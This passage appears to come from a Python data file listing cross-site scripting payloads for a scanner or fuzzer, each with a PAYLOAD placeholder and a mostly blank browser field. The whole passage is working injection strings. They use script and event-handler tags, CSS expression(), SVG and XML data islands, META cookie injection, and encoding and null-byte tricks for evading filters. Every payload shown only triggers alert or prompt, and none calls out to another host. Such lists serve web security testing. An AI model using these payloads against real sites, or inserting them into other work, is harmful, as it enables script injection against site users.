        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(PAYLOAD)</SCRIPT>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('PAYLOAD')</SCRIPT>">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(PAYLOAD)"></OBJECT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(PAYLOAD)></OBJECT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(PAYLOAD)></OBJECT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object classid="clsid:..." codebase="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(PAYLOAD)" style="behavior:url(#x);"><param name=postdomevents /></object>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(PAYLOAD)" style="behavior:url(#x);"><param name=postdomevents /></object>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object onbeforeload object onbeforeload="javascript:javascript:alert(PAYLOAD)"></object onbeforeload>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object onerror=javascript:javascript:alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object onError object onError="javascript:javascript:alert(PAYLOAD)"></object onError>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object src=1 href=1 onerror="javascript:alert(PAYLOAD)"></object>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<object type=image src=Y.gif onreadystatechange=alert(PAYLOAD)></object>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''onerror=eval;throw'alert%28PAYLOAD%29';''',
          'browser':"""[Not Info]"""},
        { 'payload':'''onmouseover=alert(PAYLOAD);''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"onmouseover="alert(PAYLOAD)"a="''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"onmouseover=alert(PAYLOAD);a="''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</plaintext\></|\><plaintext/onmouseover=prompt(1)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<p/onmouseover=javascript:alert(PAYLOAD); >Y</p>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<p style="background:url('javascript:alert(PAYLOAD)')">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<P STYLE="behavior:url('#Zault#time2')" end="0" onEnd="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<p style="font-family:'\22\3bx:expression(alert(PAYLOAD))/*'">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`><p><svg><script>a='Y%27;javascript:alert(PAYLOAD)//';</script></p>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`><p><svg><script>a='Y;alert(PAYLOAD)//';</script></p>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<p><svg><script>alert(PAYLOAD)</script></p>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27PAYLOAD%3F%29%29''',
          'browser':"""[Not Info]"""},
        { 'payload':'''s%22%20style=%22background:url(javascript:alert(’PAYLOAD’))''',
          'browser':"""[Not Info]"""},
        { 'payload':'''s%22%20style=x:expression(alert(PAYLOAD))''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<scr%00ipt%20&message=> alert(‘PAYLOAD’)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script /*%00*/>/*%00*/alert(PAYLOAD)/*%00*/</script /*%00*/''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>({0:#0=alert/#0#/#0#(PAYLOAD)})</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>({0:#0=eval/#0#/#0#(javascript:alert(PAYLOAD))})</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>/* *%00/javascript:alert(PAYLOAD)// */</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%00>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%00javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%09>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%09javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%09type="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0A>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%0Ajavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0Atype="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%0Bjavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0C>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%0Cjavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0Ctype="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0D>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%0Djavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%0Dtype="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>+-+-PAYLOAD-+-+alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''><script>PAYLOAD<\\/script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\"><script>PAYLOAD<\\/script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\\\'><script>PAYLOAD<\\/script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%20>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%20javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%20language=vbscript>msgbox%20PAYLOAD</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%20type="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%21javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>/* *%2A/javascript:alert(PAYLOAD)// */</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%2Bjavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%2F>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':''''"`><script>/* *%2Fjavascript:alert(PAYLOAD)// */</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%2Ftype="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%3Bjavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script%3Etype="text/javascript">javascript:alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<ScRipT 5-0*3+9/3=>prompt(PAYLOAD)</ScRipT Y=?''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%7Ejavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>a%006cert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT>a=/PAYLOAD/''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>a='Y\\';alert(PAYLOAD)//Y';</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`><script>a=/Y;;i=0;alert(PAYLOAD);a/i;</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT>a=/Y/\nalert(PAYLOAD);</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<<SCRIPT>alert(PAYLOAD);/''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD,PAYLOAD</script//)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD,PAYLOAD</script/)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD)/Y/'</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>’alert(PAYLOAD)’.replace(/.+/,eval)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<<script>alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!-- -- --><script>alert(PAYLOAD);</script><!-- -- -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<%25<!--'%25><script>alert(PAYLOAD);</script -->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script<{alert(PAYLOAD)}/></script </>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>/* */alert(PAYLOAD)// */</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(\'\\/\\PAYLOAD\\/\\\')</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(\'\\\\PAYLOAD\\\\\')</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(\'PAYLOAD\')</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD)<!-- '</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD)</script>;''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD)</script>/''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':''''`"><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''' '><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''''><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
          'browser':"""[Not Info]"""},
        { 'payload':''''"`><script>/* *alert(PAYLOAD)// */</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''’><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"'`><script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“<script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“><<script>alert(PAYLOAD);//<</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“><script >alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“><script >alert(PAYLOAD)</script >''',
          'browser':"""[Not Info]"""},
        { 'payload':'''&<script>alert(PAYLOAD);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''#<script>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“><ScRiPt>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''“><ScRiPt>alert(PAYLOAD)</ScRiPt>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<<SCRIPT>alert(PAYLOAD);//<</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT> alert(\"PAYLOAD\")</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT> alert(\"PAYLOAD\");</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT>alert(PAYLOAD);</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(PAYLOAD)<script></script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert%28PAYLOAD%29</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(alert(PAYLOAD))</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''&'"><script>alert(/PAYLOAD/)</āăą>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<!-- --!><script>alert(PAYLOAD)</script>-->''',
          'browser':"""[Not Info]"""},
        { 'payload':'''&'"><script>alert(/PAYLOAD/)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert(/PAYLOAD/)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>alert("/PAYLOAD"/)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''”><script>alert(“PAYLOAD”)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''\"><script>alert(/PAYLOAD/)<script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<ScriPt>ALeRt(“ PAYLOAD ”)</scriPt>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<<SCRIPT>alert("PAYLOAD");//<</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT>+alert("PAYLOAD")</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT>+alert("PAYLOAD");</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''&'"><script>alert&lpar;&sol;PAYLOAD&sol;&rpar;<&sol;script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script Y>/*<script* */alert(PAYLOAD)</script''',
          'browser':"""[ALL]"""},
        { 'payload':'''<SCRIPT <B>alert(PAYLOAD);</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%C2%85javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%C2%A0javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script charset="%22>javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script charset='utf-8'>alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script> chr=String.fromCharCode(PAYLOAD); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%25/.Y(result)&&result.length) { ids.push(PAYLOAD); } </script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%25/.Y(result)&&result.length) { ids.push(PAYLOAD); } </script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(PAYLOAD)',384,null,'rsa-dual-use')</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%E1%9A%80javascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%E1%A0%8Ejavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>eval(‘a%006cert(PAYLOAD)’);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>eval(‘a\154ert(PAYLOAD)’);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>eval(‘a%6cert(PAYLOAD)’);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>eval(‘a\l\ert\(PAYLOAD\)’);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>eval(‘al’+’ert(PAYLOAD)’);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>execScript(“MsgBox PAYLOAD”,”vbscript”);</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''"`'><script>%F0%90%96%9Ajavascript:alert(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>alert(PAYLOAD)</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(PAYLOAD)</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>prompt(PAYLOAD)</SCRIPT>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>function::[‘alert’](PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script> function a() {} </script> <img src=PAYLOAD onerror="a();alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script> if ('a'.trim() === '') { alert(PAYLOAD); } </script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>if("x\%E0%B9%92".length==2) { javascript:alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>if("x\%E1%96%89".length==2) { javascript:alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>if("x\%EE%A9%93".length==2) { javascript:alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>if("x\".length==1) { alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<script>if("x\".length==2) { alert(PAYLOAD);}</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''' style=Y:expression(PAYLOAD) ' \" style=Y:expression(PAYLOAD) \"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style><img src="</style><img src=x onerror=alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style><img src="</style><img src=x onerror=javascript:alert(PAYLOAD)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style><img src="</style><img src=x onerror=prompt(1)//">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:alert(PAYLOAD)';</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:alert("PAYLOAD")';</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert(PAYLOAD)");}</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert(PAYLOAD)");}</STYLE><A CLASS=T></A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert('PAYLOAD')");}</STYLE><A CLASS=T></A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>.T{background-image:url("javascript:javascript:alert(PAYLOAD)");}</STYLE><A CLASS=T></A>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>li {list-style-image: url("javascript:alert(PAYLOAD)");}</STYLE><UL><LI>Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE>li {list-style-image: url(&quot;javascript:alert(&#39;PAYLOAD&#39;)&quot;);}</STYLE><UL><LI>Y''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style/onload=<!--&#09;>&#10;alert&#10;&lpar;PAYLOAD&rpar;>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style onLoad style onLoad="javascript:javascript:alert(PAYLOAD)"></style onLoad>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style onreadystatechange=javascript:javascript:alert(PAYLOAD);></style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></style onReadyStateChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:alert(PAYLOAD)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(PAYLOAD)'}{}*{-o-link-source:current}]{color:red};</style>''',
          'browser':"""[Not Info]"""},
        { 'payload':''''"--></style></script><script>alert("PAYLOAD")</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':''''"--></style></script><script>prompt(PAYLOAD)</script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<///style///><span %2F onmousemove='alert&lpar;PAYLOAD&rpar;'>SPAN''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style></style%09<img src="about:blank" onerror=javascript:alert(PAYLOAD)//></style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style></style><img src="about:blank" onerror=alert(PAYLOAD)//></style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style><!--</style><script>alert(PAYLOAD);//--></script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:alert(PAYLOAD)")}</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE TYPE="text/javascript">alert(PAYLOAD);</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE TYPE="text/javascript">alert('PAYLOAD');</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<STYLE TYPE="text/javascript">javascript:alert(PAYLOAD);</STYLE>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<// style=x:expression\28javascript:alert(PAYLOAD)\29>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<// style=x:expression\28write(PAYLOAD)\29>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style>*{x:expression(write(PAYLOAD))}</style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(PAYLOAD))}</style>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(PAYLOAD)//"></svg>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg contentScriptType=text/vbs><script>MsgBox+PAYLOAD''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg/onload=alert(PAYLOAD)''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg><style>{font-family&colon;"<iframe/onload=confirm(PAYLOAD)>"''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg><style><img/src=x onerror=alert(PAYLOAD)// </b>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg><style>&ltimg src=x onerror=alert(PAYLOAD)&gt</svg>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''</svg>''<svg><script 'Y'>alert&#x28;PAYLOAD&#x29;''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(PAYLOAD)"></g></svg''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><script>alert(PAYLOAD)</script></svg>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<TABLE BACKGROUND="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<table background="javascript:alert(PAYLOAD)"></table>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<TABLE><TD BACKGROUND="javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<TABLE><TD BACKGROUND="javascript:javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<textarea autofocus onfocus=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<textarea onfocus=javascript:alert(PAYLOAD) autofocus>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<title>Y<script>alert(PAYLOAD)</script></title>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<title onpropertychange=alert(PAYLOAD)></title><title title=></title>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<title onpropertychange=javascript:alert(PAYLOAD)></title><title title=>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<title onPropertyChange title onPropertyChange="javascript:javascript:alert(PAYLOAD)"></title onPropertyChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<var onmouseover="prompt(PAYLOAD)">Y</var>​''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video onerror="javascript:alert(PAYLOAD)"><source>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video onerror="javascript:javascript:alert(PAYLOAD)"><source>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video poster=javascript:alert(PAYLOAD)//></video>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video poster=javascript:alert(PAYLOAD)//<video poster=javascript:alert(PAYLOAD)//></video>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video poster=javascript:javascript:alert(PAYLOAD)//''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video><source onerror="javascript:javascript:alert(PAYLOAD)">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video><source onerror="prompt(PAYLOAD)"></source></video>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video src=PAYLOAD href=PAYLOAD onerror="javascript:alert(PAYLOAD)"></video>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<video src=PAYLOAD onerror=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#Zault#vml);position:absolute;width:100%25;height:100%25 src=%25(vml)s#PAYLOAD></vmlframe>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''X<form id=Y><input></form><button form=Y onformchange==javascript:alert(PAYLOAD)>X''',
          'browser':"""[Not Info]"""},
        { 'payload':'''X<form id=Y onforminput=javascript:alert(PAYLOAD)><input></form>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=0><I><B><IMG SRC="javas<!-- -->cript:alert(PAYLOAD)"></B></I></XML>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(PAYLOAD)"&gt;</B></I></XML>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(PAYLOAD);">]]>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(PAYLOAD);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(PAYLOAD);">]]</C><X></xml>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml id="Y" src="%25(htc)s"></xml> <label dataformatas="html" datasrc="#Y" datafld="PAYLOAD"></label>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml id="T" src="Y.htc"></xml><label dataformatas="html" datasrc="#T" datafld="PAYLOAD"></label>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml id="X"><a><b><script>alert(PAYLOAD);</script>;</b></a></xml>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(PAYLOAD)"></xml onPropertyChange>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml onreadystatechange=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml> <rect style="height:100%25;width:100%25" id="Y" onmouseover="alert(PAYLOAD)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xml src="javascript:alert(PAYLOAD);">''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<?xml-stylesheet href="javascript:alert(PAYLOAD)"?><root/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<?xml-stylesheet type="text/css"?><root style="x:expression(write(PAYLOAD))"/>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(PAYLOAD);</html:script></html:html>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(PAYLOAD)>]]></payload></x>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(PAYLOAD)//'>  <script> x='<%25' </script> %25>/ alert(PAYLOAD) </script>  XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>''',
